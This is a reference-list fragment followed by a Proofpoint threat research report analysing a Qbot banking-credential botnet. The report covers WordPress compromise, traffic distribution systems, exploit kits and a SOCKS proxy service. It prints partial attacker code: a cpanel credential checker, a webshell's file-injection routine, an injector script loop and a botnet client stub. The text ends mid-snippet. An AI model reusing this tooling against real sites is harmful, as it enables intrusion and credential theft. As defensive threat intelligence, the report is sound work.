[27] S. Kaplan, B. Livshits, B. Zorn, C. Seifert, and C. Curtsinger. "nofus: Automatically detecting" + string.fromcharcode(32) + "obfuscated ".tolowercase() + "javascript code". Technical Report MSR-TR-2011-57, Microsoft Research, May 2011.

[28] J. C. King. Symbolic execution and program testing. *Commun. ACM*, 19:385–394, July 1976.

[29] T. Kohno, A. Broido, and K. C. Claffy. Remote physical device fingerprinting. In *Proceedings of the IEEE Symposium on Security and Privacy*, pages 211–225, 2005.

[30] O. Komili. Poisoned search results: How hackers have automated search engine poisoning attacks to distribute malware. Technical report, Sophos, 2011.

[31] J.-L. Lin. Detection of cloaked web spam by using tag-based methods. *Expert Syst. Appl.*, 36:7493–7499, May 2009.

[32] G. Maone. Noscript. `https://addons.mozilla.org/de/firefox/addon/722`, 2009.

[33] L. Martignoni, M. Christodorescu, and S. Jha. OmniUnpack: Fast, generic, and safe unpacking of malware. In *Annual Computer Security Applications Conference*, pages 431–441, 2007.

[34] L. Meyerovich and B. Livshits. ConScript: Specifying and enforcing fine-grained security policies for Javascript in the browser. In *IEEE Symposium on Security and Privacy*, May 2010.

[35] Microsoft Corporation. The new JavaScript engine in Internet Explorer 9. `http://blogs.msdn.com/b/ie/archive/2010/03/18/the-new-javascript-engine-in-internet-explorer-9.aspx`, Mar. 2010.

[36] P. Milani Comparetti, G. Salvaneschi, C. Kolbitsch, E. Kirda, C. Kruegel, and S. Zanero. Identifying dormant functionality in malware programs. In *Proceedings of the IEEE Symposium on Security and Privacy*, pages 61–76, 2010.

[37] Y. min Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, S. Chen, and S. T. King. Automated web patrol with Strider HoneyMonkeys: Finding web sites that exploit browser vulnerabilities. In *Network and Distributed System Security Symposium*, 2006.

[38] D. Molnar, X. C. Li, and D. A. Wagner. Dynamic test generation to find integer bugs in x86 binary Linux programs. In *Proceedings of the Usenix Security Symposium*.

[39] A. Moser, C. Kruegel, and E. Kirda. Exploring multiple execution paths for malware analysis. In *Proceedings of the IEEE Symposium on Security and Privacy*, pages 231–245. IEEE Computer Society, 2007.

[40] A. Moshchuk, T. Bragin, S. D. Gribble, and H. M. Levy. A crawler-based study of spyware in the web. In *Network and Distributed System Security Symposium*, 2006.

[41] K. Mowery, D. Bogenreif, S. Yilek, and H. Shacham. Fingerprinting information in JavaScript implementations. In *Proceedings of Web 2.0 Security and Privacy 2011*, May 2011.

[42] K. Natvig. Sandbox technology inside AV scanners. In *In Proceedings of the 2001 Virus Bulletin Conference*, 2001.

[43] K. Natvig. Sandbox II: Internet. In *In Proceedings of the 2002 Virus Bulletin Conference*, 2002.

[44] J. Nazario. PhoneyC: A virtual client honeypot. In *Proceedings of the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats*, April 2009.

[45] C. S. Pasareanu and N. Rungta. Symbolic pathfinder: symbolic execution of Java bytecode. In *Proceedings of the Conference on Automated Software Engineering*, pages 179–180, 2010.

[46] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All your iframes point to us. In *USENIX Security Symposium*, pages 1–16, 2008.

[47] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and N. Modadugu. The ghost in the browser: Analysis of web-based malware. 2007.

[48] P. Ratanaworabhan, B. Livshits, and B. Zorn. Nozzle: A defense against heap-spraying code injection attacks. In *Proceedings of the Usenix Security Symposium*, Aug. 2009.

[49] P. Royal, M. Halpin, D. Dagon, R. Edmonds, and W. Lee. PolyUnpack: Automating the hidden-code extraction of unpack-executing malware. In *Annual Computer Security Applications Conference*, pages 289–300, 2006.

[50] P. Saxena, D. Akhawe, S. Hanna, F. Mao, S. McCamant, and D. Song. A symbolic execution framework for JavaScript. Technical Report UCB/EECS-2010-26, EECS Department, University of California, Berkeley, Mar 2010.

[51] P. Saxena, S. Hanna, P. Poosankam, and D. Song. Flax: Systematic discovery of client-side validation vulnerabilities in rich web applications. In *Network and Distributed System Security Symposium*.

[52] C. Seifert, V. Delwadia, P. Komisarczuk, D. Stirling, and I. Welch. Measurement study on malicious web servers in the .nz domain. In *Australasian Conference on Information Security and Privacy*, pages 8–25, 2009.

[53] SkyLined. Internet Explorer IFRAME src&name parameter BoF remote compromise. `http://skypher.com/wiki/index.php?title=Www.edup.tudelft.nl/~bjwever/advisory/_iframe.html.php`, 2004.

[54] M. Smart, G. R. Malan, and F. Jahanian. Defeating TCP/IP stack fingerprinting. In *Proceedings of the Usenix Security Symposium*, 2000.

[55] C. Song, J. Zhuge, X. Hand, and Z. Ye. Preventing drive-by download via inter-module communication monitoring. In *Proceedings of the Asian Symposium on Information, Computer, and Communication Security*, April 2010.

[56] Sophos Labs. Security threat report 2011, 2011.

[57] J. W. Stokes, R. Andersen, C. Seifert, and K. Chellapilla. WebCop: Locating neighborhoods of malware on the web.

[58] P. Tu and D. Padua. Gated SSA-based demand-driven symbolic analysis for parallelizing compilers. In *Proceedings of the International Conference on Supercomputing*, pages 414–423, 1995.

[59] R. van den Heetkamp. Heap spraying. `http://www.0x000000.com/index.php?i=412&bin=110011100`, Aug. 2007.

[60] L. Wall. Perl security. `http://search.cpan.org/dist/perl/pod/perlsec.pod`.

[61] T. Wang, T. Wei, Z. Lin, and W. Zou. IntScope: Automatically detecting integer overflow vulnerability in x86 binary using symbolic execution. In *Proceedings of the Network and Distributed System Security Symposium*, 2009.

[62] G. Wassermann, D. Yu, A. Chander, D. Dhurjati, H. Inamura, and Z. Su. Dynamic test input generation for web applications. In *ISSTA*, pages 249–260, 2008.

[63] C. Willems, T. Holz, and F. Freiling. Toward Automated Dynamic Malware Analysis using CWSandbox. *IEEE Security and Privacy*, 2(2007), 5.

[64] B. Wu and B. D. Davison. Cloaking and redirection: A preliminary study. In *Adversarial Information Retrieval on the Web*, pages 7–16, 2005.

[65] B. Wu and B. D. Davison. Detecting semantic cloaking on the web. In *Proceedings of the International Conference on World Wide Web*, pages 819–828, 2006.

[66] T. Xie, N. Tillmann, J. Halleux, and W. Schulte. Fitness-guided path exploration in dynamic symbolic execution. Technical report, Microsoft Research, Sept. 2008.

[67] C. Xuan, J. Copeland, and R. Beya. Toward revealing kernel malware behavior in virtual execution environments. In *RAID*, 2009.

[68] J. Yang, C. Sar, P. Twohey, C. Cadar, and D. R. Engler. Automatically generating malicious disks using symbolic execution. In *IEEE Symposium on Security and Privacy*, pages 243–257, 2006.

[69] K. Zeeuwen, M. Ripeanu, and K. Beznosov. Improving malicious URL re-evaluation scheduling through an empirical study of malware download centers. pages 42–49, 2011.

[70] J. Zhuge, T. Holz, C. Song, J. Guo, X. Han, and W. Zou. Studying malicious websites and the underground economy on the Chinese web. 2008.

*October 25, 2011*

# APPENDIX 4



# Analysis of a Cybercrime Infrastructure

Analysis of a Cybercrime Infrastructure

# Contents

Executive Summary ..................................................................................3

Context: The Attack Chain .......................................................................4

Inside the Attack ......................................................................................6

    Who are the attackers? .......................................................................6

    Phase 1: Infecting Legitimate Web Sites ...........................................6

    Phase 2:  Filtering Targets – Traffic Distribution Systems..................10

    Phase 3:  Getting Into the Users' Machines – Exploits......................13

    Phase 4:  Stealing User Banking Credentials – Malware ...................17

    Phase 5: Infected PCs Used to Run Paid Proxying Service for Other
    Crime Groups .....................................................................................19

    Who were the victims?........................................................................22

Implications ...........................................................................................23

    Financial Implications .........................................................................23

    End–user Perspective: Safeguarding PCs and Browsing ..................24

    Institutional Perspective: Safeguarding Banks  ...............................24

    Website Perspective:  A Note on WordPress  ...................................24

APPENDIX................................................................................................25

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

# Executive Summary

Proofpoint security researchers have published an analysis that exposes the inner workings of a cybercrime operation targeting online banking credentials for banks in the United States and Europe. This Proofpoint research report provides a detailed and rarely seen inside view of the infrastructure, tools and techniques that enabled this cybercrime group to infect over 500,000 PCs.

Key facts from the Proofpoint analysis:

- Russian-speaking cybercrime group targeted primarily US-based systems and online banking accounts.

- Qbot (aka Qakbot) botnet of 500,000 infected systems sniffed 'conversations' – including account credentials – for 800,000 online banking transactions, with 59% of the sniffed sessions representing accounts at five of the largest US banks.

- The attackers compromised WordPress sites using purchased lists of administrator logins, with which they were able to upload malware to legitimate sites in order to then infect clients that visited these sites. Many of these WordPress sites also run newsletters, which the attackers leverage to distribute legitimate but infected content.

- Windows XP clients comprised 52% of the infected systems in the cybercrime group's botnet, even though recent estimates place the Windows XP install base at 20–30% of business and consumer personal computers. Microsoft ended patch and update support for Windows XP in April 2014.

- The cybercrime group used compromised PCs to offer a sophisticated, paid proxying service for other organized crime groups. The service turns infected PCs into an illicit 'private cloud' as well as infiltration points into corporate networks.

The report also includes specific guidance to WordPress site owners on how to detect infections and harden their sites against similar attacks.

Windows XP clients comprised **52%** of the infected systems in the cybercrime group's botnet. Microsoft ended patch and update support for Windows XP in April 2014.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

# Context: The Attack Chain

*Cybercrime has evolved significantly from single actors in remote locations – the stereotypical "geek in a garage" – to sophisticated, multi-tier infrastructure that uses vertically integrated collaboratives operated by cybercrime groups and state–affiliated actors. Before delving into the specifics of the attackers' infrastructure, it is useful to have an overview of a modern attack chain. This section provides an overview of a generic attack infrastructure.*



Figure 1: Cybercrime Attack Chain

Modern threats frequently use an integrated system of legitimate but compromised websites, obfuscated redirects, "traffic redirection system" (TDS) filters, exploit kit hosting sites, and malware hosting sites. Depending on their objectives and resources, attackers may rely on users to visit these compromised sites based on their popularity or relevance (such as industry–specific or social media sites); attempt to lead users to them using targeted or broad–based phishing emails; or may 'piggyback' on legitimate emails such as newsletters or marketing emails that include links to compromised sites. In fact, many of these compromised sites run newsletter services, which helped to distribute infected content.

These components work together to compromise end–user computers and inject malware – invisibly to the end user, typically in less than five seconds, without *any* action on the user's part other than visiting the initial website.

The generic steps are as follow:

1. The compromised sites contain or link to a Traffic Distribution System (TDS) filter, which checks to ensure the incoming browser is a target. (For example, is the browser of a version subject to compromise? Is it coming from the right sort of domain or location? Is it a security company or researcher?) Often, URLs embedded in email or other sites point to compromised, positive–reputation sites. The positive reputation of the sites that ensures URLs are not blocked by antivirus or, when targeting organizations, security gateways.

2. If the incoming browser is the right target, then the TDS will "merge in" content from an exploit server; otherwise, the TDS will be silent.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

3. By exploiting a browser (or plugin) vulnerability (for example, a Java, Flash, or PDF vulnerability), the exploit server penetrates an end user's operating system defenses, and emplaces "dropper" software.

4. The emplaced "dropper" then downloads additional malware.

Proofpoint has seen that these systems are not only effective, but flexible: because of the use of an emplaced "dropper" rather than a single piece of malware, the compromised computer can be stocked with multiple elements of malware, assisting the malware in avoiding signature detection (if one element is detected, others may not be) as well as in ensuring the compromised system can be used in multiple ways.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

# Inside the Attack

Recently, Proofpoint researchers detected a large number of legitimate websites that had been compromised. The websites now contained scripts that "pull in" content from a single host that was serving exploits. Analysis of the malware and the sites led researchers to an open and unprotected control pane used by the attackers who controlled the malicious site. In an effort to share information with the security community, and to arm end users with the knowledge to protect themselves and their systems, this report reveals what Proofpoint researchers learned about this attacker's means and methods.

## Who are the attackers?

Based on information gleaned from the attacker's control panels, such as language preferences and the language of the server names and documentation, as well as from further research, the attackers behind this operation appear to be a Russian cybercrime group whose primary motivation is financial. While the primary targets appear to be financial accounts and online banking information, the group also has a range of options for further monetization of the infected computers.

## Phase 1: Infecting Legitimate Web Sites

*The first step the attackers took in building their infrastructure was to find and compromise legitimate WordPress sites and inject them with malicious code that would allow them to compromise vulnerable end-user PCs.*



Figure 2

The attackers have been able to build a network of infected systems thanks to a highly operationalized process that employs automation wherever possible. Because the initial dropper Qbot (aka Qakbot) generates a unique identifier for each infection, it is evident from the attackers' database that they currently have over a half million unique PC infections. Since each unique infection (a PC) can be assigned different IP addresses during its lifecycle, it appears that the botnet has covered almost two million unique IPs (Screenshot 1).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH



Screenshot 1. Roughly 500,000 unique infections, 2 million IP addresses

When Proofpoint researchers analyzed the attackers' operation it was possible to identify the steps and components of this process:

1. Following common practice, the attackers purchased a large number of password lists from the underground cybercriminal economy, consisting primarily of compromised shared hosting cpanel (a type of control panel) accounts and FTP accounts (not necessarily of shared hosting). These credentials had been harvested primarily by malware on endpoints.

2. The attackers then ran their own custom-made tool, cpanel_checker.pl (Screenshot 2), which verified, one by one, accounts from these purchased lists and filtered out the working ones:

```perl
cpanel_checker.pl

289  sub process_cpanel
290  {
291      my ($r) = @_;
292
293      my ($server, $port, $login, $password) = ($r->{HOST}, "2082", $r->{
         LOGIN}, $r->{PASSWORD});
294
295      my $browser = LWP::UserAgent->new();
296      $browser->agent("Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1");
297      $browser->timeout(30);
298      my $target_url = "http://$server:$port/";
299
300      print "processing $target_url...\n";
301
302      my $response = $browser->get($target_url);
303      if ($response->is_success) {
304      print "response ok\n";
305      log_write($r, 10, "Not cpanel");
306      return 1;
307      } else {
308  #   print "response failed\n";
309
310      my $realm_hdr = $response->header('WWW-Authenticate');
311      $realm_hdr =~ /Basic realm="(.+?)"/;
312      my $realm_name = $1;
```

Screenshot 2. cpanel_checker.pl

The attackers purchased a large number of password lists from the Russian underground economy, consisting primarily of compromised shared hosting cpanel accounts and FTP accounts. These credentials had been harvested primarily by malware on endpoints.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a cybercrime infrastructure

3. Using the verified list of logins, the attackers manually logged into legitimate websites and injected a webshell. A webshell is a server–side script (PHP, ASP, Perl, etc) acting as a backdoor; webshells often offer interfaces similar to file managers, allowing attackers to perform arbitrary file operations and execute arbitrary commands. A common injection vector is within legitimate files of open source platforms such as WordPress or OpenX. At the same time, webshells are often obfuscated (ex: using eval()) to avoid detection.

Webshells range from full–blown "web-based file managers" to "microshells" that simply execute commands sent to them. Full–blown webshells are so convenient that attackers often use them as their own remote control panels.

On one of the group's command and control servers, Proofpoint researchers encountered two full–blown webshells:



Screenshot 3. First webshell on the cybercrime group's C&C server



Screenshot 4. Second webshell on the cybercrime group's C&C server

The webshells were used by this group to control their own servers, as well as to control those that they compromised.

To automate their WordPress malicious injection process, the group injected into their compromised websites a very specialized webshell, "iframe_agent.php" (Screenshot 5).

Webshells range from full–blown "web–based file managers" to "microshells" that simply execute commands sent to them. Full–blown webshells are so convenient that attackers often use them as their own remote control panels.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

```
480    function IframeFileDynamic($file_path, $mark_begin, $mark_end, $inject_pos, $data, $inject_code)
481    {
482        print_dbg("IframeFileDynamic(): file_path=$file_path inject_pos=$inject_pos data=$data");
483
484        $ret = 0;
485
486        $file_mod_time = filemtime($file_path);
487        $file_access_time = fileatime($file_path);
488
489        print_dbg("IframeFileDynamic(): file_create_time: ".date("F d Y H:i:s.", $file_mod_time)." file_
490
491        $fh_src = fopen($file_path, "r");
492        if (!$fh_src) {
493            print_err("IframeFileDynamic(): fopen('$file_path', 'r') failed");
494            return -1;
495        }
496
497        $file_data = fread($fh_src, filesize($file_path));
498        if (!$file_data) {
499            print_err("IframeFileDynamic(): fread() failed");
500            return -2;
501        }
502
503        fclose($fh_src);
504
505        $file_data_len_1 = filesize($file_path);
506
507        $pattern = "/".regexp_prepare($mark_begin).".+".regexp_prepare($mark_end)."/";
508        $pattern2 = regexp_prepare($mark_begin).".(.+)".regexp_prepare($mark_end);
509 #      $pattern = "/\"\" abc123 \"\".v\/\" xyz987 \"\"/";
510
511        print_dbg("IframeFileDynamic(): pattern='$pattern' strlen(file_data)=".strlen($file_data));
512
513        // If old code here, replace it
514        //
515 //!!!     if (ereg($pattern2, $file_data, $m)) {
516        if (preg_match("/".$pattern2."/", $file_data, $m, 0, 0)) {
517 //      print_dbg("IframeFileDynamic(): match found m[1]=".$m[1]);
```

Screenshot 5. Cybercrime group's very specialized webshell "iframe_agent.php"

According to the parameters used to call iframe_agent.php, this shell can inject
(or remove) a piece of text (usually the malicious script) into a specified file at a
specified location. The attackers call this type of injection "static injection." The shell
also supports "dynamic injection," in which the caller specified a pattern (regex), and
injections can happen right before or right after the pattern, depending
on specification.

In addition to allowing a remote attacker to inject malicious scripts into any file,
iframe_agent.php features WordPress–specific features, such as the ability to add
WordPress admin accounts.

Proofpoint has not encountered an automated tool for uploading this specialized
shell into compromised sites, and believes the attackers may be doing this manually.
Some actors infect legitimate websites by running tools to massively scan for
vulnerable open source software (ex: WordPress, OpenX, osCommerce) and to
use existing exploits to inject into them. However Proofpoint did not observe this
cybercrime group doing this; instead, they seem to rely primarily on purchased
credential lists.

4. Remotely inject malicious scripts into legitimate WordPress sites. On their attack
   server, the attackers executed smartiframer.pl to connect to iframe_agent.php and
   to auto–inject malicious JavaScript (or pre–injected files) into legitimate websites using
   the verified cpanel credential lists (Screenshot 6).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

```
  sub do_infect
  {
      my ($action, $inject_code, $m1_1, $m2_1) = @_;

      print "url $iframer_url\n";

      log_write("$iframer_url");

      foreach my $f (@target_files) {
      my %req_params = ();
      my ($ic_before, $ic_after) = ($m1_1, $m2_1);

      print "    file $f\n";

      if ($action eq "edit_d" || $action eq "crt_d") {
          # TODO: calculate md5 or random strings
          #
  #       $m1 .= "/* AAA */";
  #       $m2 .= "/* BBB */";
          $ic_before .= gen_random_mark($f, "BEGIN");
          $ic_after = gen_random_mark($f, "END").$ic_after;
      }

      $req_params{"a"}  = $action;
      $req_params{"fp"} = $f;
      if ($inject_pos < 4) {
          $req_params{"pos"} = $inject_pos;
          $req_params{"da"}  = $data;
      }
      $req_params{"ic"} = $inject_code;
```

Screenshot 6. WordPress injector "smartiframer.pl")

This process continues in the next section, where we see how the attackers filter visiting systems for potential victims and direct them to servers hosting Exploit Kits (EK).

## Phase 2:  Filtering Targets – Traffic Distribution Systems

*As end–users' browsers visit the infected WordPress sites, the next stage of the attackers' infrastructure – a TDS – filters out potential victims based on IP address, browser type, operating system, and other criteria. This filtering enables attackers to maximize their successful expoitation rate, while minimizing exposure to security scanners or researchers. If served to security researchers or scanners such as Proofpoint's, the infection will be detected regardless of success or failure of exploitation.*

It is common practice for attackers to add a Traffic Distribution Service (TDS) to avoid detection. TDS's have been widely used by attackers as a means to "cut the attack chain" in the face of a security scanner.



Figure 3

When end users browse the web sites compromised by the attackers, the scripts that the attackers added to the compromised site's page will cause the visiting browsers to ultimately load and run unwanted software in a manner that is completely transparent to the end user.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

In order to avoid detection, it is common practice for attackers to add a layer of redirection, known as a Traffic Distribution Service (TDS). Originally used to route web traffic, TDS's have been widely used by attackers as a means to "cut the attack chain" in the face of a security scanner.

The TDS will only lead visiting browsers into loading exploits if it has verified that the client is neither a crawler nor a security scanner, and that an exploit is indeed available for the visiting browser. This technique is sometimes referred to as "cloaking"; since the visiting IP address plays a significant role in this decision process, it can also referred to as "IP cloaking."

Today, cybercrime groups often offer TDS's as a service. The observed cybercrime group, however, appears to have always hosted their own TDS. Prior to Oct 2013, they were using Simple TDS (Screenshot 7–1), and then from Oct 2013 to Mar 2014, they were using Keitaro TDS (Screenshot 7–2). From March 4 to the present, they switched to using Sutra TDS, which is a powerful TDS that has been popular among cybercrime groups in order to cloak IP addresses and circumvent detection (Screenshot 8).



Screenshot 7–1. The group's Simple TDS management console



Screenshot 7–2. The group's Keitaro TDS management console

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a cybercrime infrastructure



Screenshot 8. The group's Sutra TDS management console showing configurations for Sweet Orange, Blackhole, Styx, Phoenix, and their custom-made exploit kits)

This view of the cybercrime group's Sutra console shows that Sutra TDS supports traffic redirection based on IP address, proxy, referer, cookies, geolocation, language, and network (IP address range) (Screenshot 9):

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure



Screenshot 9. Sutra TDS traffic redirection settings

The Sutra TDS provides a robust set of filters that the attackers can use to narrow their potential targets and steer away researchers or others to whom this group would not want to expose their activities.

This TDS provides a robust set of filters that the attackers can use on the one hand to narrow their potential targets, and on the other hand to steer away researchers or others to whom this group would not want to expose their activities.

## Phase 3:  Getting Into the Users' Machines – Exploits

*Having been filtered by the TDS, the next step is the next step is to unnoticeably gain access to the end user's machine. This is done by exploiting a vulnerability in the browser or in–browser plugins in order to cause the client system to run unwanted code.*



Figure 4

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Potential victims are directed to servers hosting exploit kits that run one or more exploits to gain an initial foothold on the client system. Currently, this cybercrime group implements different EK configurations against different browser families, and leverages Sutra TDS to redirect traffic accordingly:



Screenshot 10. Sutra TDS configuration for IE



Screenshot 11. Sutra TDS redirection configuration for FireFox

Infected websites cause visiting browsers to silently load exploits and to install malware, without the victim noticing or having to "click on" or "agree to" anything. Simply visiting the website may result in a system compromise.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

At the same time, the attackers leverage additional Java exploits and therefore implement yet a separate rule (Screenshot 12):



Screenshot 12. Sutra TDS configuration for browsers vulnerable to Java exploits

Infected websites cause visiting browsers to silently load exploits and to install malware, without the victims noticing or having to "click on" or "agree to" anything. *Simply visiting the website may result in a system compromise.*

The Sutra TDS management console enables the attackers to track daily traffic and infection rates. The list of infected websites is reflected by the referers list (Screenshot 14).

### Summary for 'total'

This month, top 'Raw hits' = 105078

| Date | Raw hits | Uniques | Proxies | Without referer |
|---|---|---|---|---|
| total | 47051594 | 23644338 (50.3%) | 28966153 (61.6%) | 320266 (0.7%) |
| 2014/09/16 | 14981 | 9448 (63.1%) | 37 (0.2%) | 143 (1.0%) |
| 2014/09/15 | 36073 | 21730 (60.2%) | 44 (0.1%) | 331 (0.9%) |
| 2014/09/14 | 24984 | 15295 (61.2%) | 31 (0.1%) | 121 (0.5%) |

Screenshot 13. Sutra TDS daily traffic



| Referers | Raw hits | Unique hits |
|---|---|---|
| http://www.myc...-conditions/fiber-lifestyle/ | 1051 | 932 |
| http://www.myc...-conditions /orthodontics-br... | 780 | 707 |
| http://www.myc...-conditions /components-of-... | 648 | 571 |
| http://eng... | 588 | 470 |
| http://www.cone... / | 357 | 174 |

| Referer domains | Raw hits | Unique hits |
|---|---|---|
| www.m...ti... | 2771 | 2460 |
| english... | 2258 | 1065 |
| www.co...ns.com | 1072 | 390 |
| www.f1... | 989 | 228 |
| mp3tec... | 875 | 221 |
| www.f4... | 711 | 426 |

Screenshot 14. Sutra TDS referer list, equivalent to a list of infected websites

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

In order to circumvent gateway and endpoint antivirus detection, the attackers must well obfuscate their code, as well as ensure non–blacklisting of their malicious domains. Scripting submissions to the Scan4U service enables the group to check the 'evasiveness' of not just the malware payload, but also of multiple components in the attack chain, including for example (Screenshot 15):

- TDS URL

- Exploit kit URL

- Malicious JavaScript that will be injected

- Obfuscated Qbot



Screenshot 15. Script to auto-check all malicious components against Scan4u

If any antivirus vendor starts to detect any of these exploits the tool notifies the attackers using ICQ.

The Scan4U service checks these exploits for their ability to evade detection against twenty–five widely used antivirus solutions.

For an added level of assurance – and a wrinkle in vendors' efforts to block new malware variants – if any antivirus vendor starts to detect any of these exploits, the tool notifies the attackers using ICQ. In fact, this group heavily leverages ICQ for instant system alerts. Whenever the attackers re–obfuscate their Qbot, the inital antivirus detection rate is always 0–5 out of 55 vendors on VirusTotal, or less than 10% detection by major antivirus solutions (Screenshot 16).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure



Screenshot 16. As a result of obfuscation and evasiveness testing, 0 out of 55 antivirus vendors on VirusTotal flags them

Able to evade end–user's antivirus defenses, the exploit leverages a browser (or browser plugin) vulnerability that causes the browser or plugin to run a piece of shellcode, which then downloads a 'dropper' – in this case 'Qbot' – from another server. Qbot can then download and install one or more pieces of malware based on the attacker's commands.

## Phase 4:  Stealing User Banking Credentials – Malware

*Malware deployed, the attackers set about stealing online banking credentials through the infected systems.*

Figure 5

A process that began with compromising legitimate WordPress sites and using a Sutra TDS to filter potential victims to an exploit kit server – such as Sweet Orange – led to the download of the 'Qbots', which can then lead to the download of multiple types of malware onto the infected end–users' systems.

The Qbots connect back to the group's command and control (C&C) servers, thus providing the group visibility over the infection base (Screenshot 17).

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure



Screenshot 17. The group's Qbot command and control panel

Qbot accepts "tasks" issued by the control panel, and the console lists each bot's latest tasks. Qbot has the ability to download more malware, and for this purpose the console also displays different types of software installed, their families, and installation counts.



Screenshot 18. Qbot is able to install any other malware

Qbot looks for specific online banking traffic and sends it back to the C2. This group uses the Session Spy console to find and collect usable credentials.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

| Software installed | | |
|---|---|---|
| **Software** | **Category** | **Installs** |
| veterocheg | veterocheg | 1 |
| ext_ip_test_2 | ext_ip_test_2 | 7159 |
| ext_ip_test | ext_ip_test | 9897 |
| sti_podmena4 | sti_podmena4 | 48520 |
| sti_podmena3 | sti_podmena3 | 33 |
| sclasse | troj | 204 |
| sti_podmena_2 | podmena_2 | 60345 |
| podmena | sti_podmena | 53397 |
| vnc37 | vnc37 | 58 |

Screenshot 19. Qbot's control panel displays the list of additionally installed malware

Proofpoint's initial examination of this group's Qbot revealed that it includes a module called "Session Spy," which is a framework for sniffing HTTPS traffic.

HTTPS traffic is encrypted, so in order to sniff it one must hook into the browser and read the content at a program point after the browser has decrypted the HTTPS traffic. This is exactly what Qbot does: it looks for specific online banking traffic and, once captured, sends it back to the C&C. This group uses the Session Spy console to find and collect usable credentials.

## Phase 5: Infected PCs Used to Run Paid Proxying Service for Other Crime Groups
*Once this cybercrime group has infected a PC, attackers have numerous options available to monetize that PC and increase revenue generated by each of the end-user-systems they control.*

Stealing bank account credentials via Qbot is just one option available to the attackers for generating revenue from their infected clients: Qbot includes another module called "SocksFabric," which builds up a large tunneling network based on SOCKS5. The cybercrime group offers this network as a paid tunneling service that lets attackers a) build their own 'private cloud' to run encrypted communications and transfer stolen data, or b) use the compromised end points as infiltration points into targeted organizations. This service can be rented to other attackers, generating additional revenue for this cybercrime group.

The SocksFabric SDK is written in C and it allows any executable to become a part of the SocksFabric botnet (Screenshot 20). Although originally written to support cross-platform compilation, it seems that the primary users of the SocksFabric SDK are currently Windows malware developers.

When called, the SocksFabric API creates a new thread and connects back to the SocksFabric command and control (C&C) server named "nattun server". Nattun is written in C and acts as a) a directory service for all connected SocksFabric clients, and b) an intermediary between the "paying user" and the selected client. A paying user logs into the SocksFabric control panel, which is written in PHP (and some Perl, Screenshot 21) and talks to nattun servers.

Qbot includes another module called "SocksFabric," which builds up a large tunneling network based on SOCKS5. The cybercrime group offers this network as a paid tunneling service that lets attackers build their own 'private cloud' to run encrypted communications and transfer stolen data.

©2014 Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. 10/14

THREAT RESEARCH

Analysis of a Cybercrime Infrastructure

```
nattun_client_test.c    ×
73
74   int main(int argc, char ** argv)
75   {
76       WSADATA wsaData;
77       int sock = -1;
78
79       if (argc != 3) {
80           print_usage(argv[0]);
81           return 1;
82       }
83
84       save_start_time();
85
86       WSAStartup(MAKEWORD(2,2), &wsaData);
87
88       start_nattun_client(argv[1], argv[2]);
89
90       return 0;
91   }
92
```
39 characters selected                                          Tab Size: 4          C

Screenshot 20. Single-line API makes it easy for any malware to join the SocksFabric botnet

```
socks_downloader.pl    ×
105              }
